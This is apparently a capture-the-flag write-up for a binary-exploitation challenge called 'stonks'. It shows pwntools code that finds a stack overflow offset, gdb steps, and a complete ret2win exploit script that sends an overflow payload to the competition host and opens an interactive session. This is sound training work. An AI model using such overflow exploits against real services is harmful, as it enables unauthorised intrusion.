pwn

stonks

Solved by: Taz and thewhiteh4t

from pwn import *

# Crash the local binary with a de Bruijn pattern and recover, from the core
# dump, how many input bytes lie before the saved return address.
PATTERN_LEN = 200
WORD = 8  # n=8: 64-bit word width, so each 8-byte window of the pattern is unique

target = process("./chal")
target.sendline(cyclic(PATTERN_LEN, n=WORD))
target.wait()  # block until the child has died and the core has been written

# Read the 8 pattern bytes sitting at rsp in the core and map them back to
# their position in the pattern. Assumes the fault happens on the `ret`
# itself (rsp still points at the clobbered return-address slot) — this is
# the pwntools corefile idiom; confirm against the crash register dump.
crash = target.corefile
offset = cyclic_find(crash.read(crash.rsp, WORD), n=WORD)
print(offset)

OUTPUT :

# List the functions the binary exposes; the exploit below relies on one of
# them (ai_debug) being present and reachable by address.
info functions

# Stop at main, start the program, then resume execution directly at
# ai_debug (gdb `jump` does not push a return address) to check what that
# function does before spending effort on the payload.
b main
run
jump ai_debug

OUTPUT :

Exploit :

#!/usr/bin/python3

from pwn import *

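host = 'stonks.hsc.tf'
port = 1337
offset = 40      # bytes from input start to the saved return address (value printed by the corefile step for this binary)
addr = 0x401258  # presumably the address of ai_debug — confirm with `info functions`
ret = 0x4012f3   # presumably a lone `ret` gadget; commonly inserted so the stack is 16-byte aligned on entry to addr — confirm

# Payload: padding up to the return-address slot, the `ret` gadget, then the
# target address, both packed as 64-bit little-endian words.
junk = b'A' * offset
le_num = p64(addr)
le_ret = p64(ret)
buffer = junk + le_ret + le_num

conn = remote(host, port)
# Pass bytes, not str: recent pwntools versions warn on a str argument and
# silently assume ASCII; the delimiter is unchanged.
conn.recvuntil(b'symbol:')
conn.sendline(buffer)
conn.interactive()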

OUTPUT :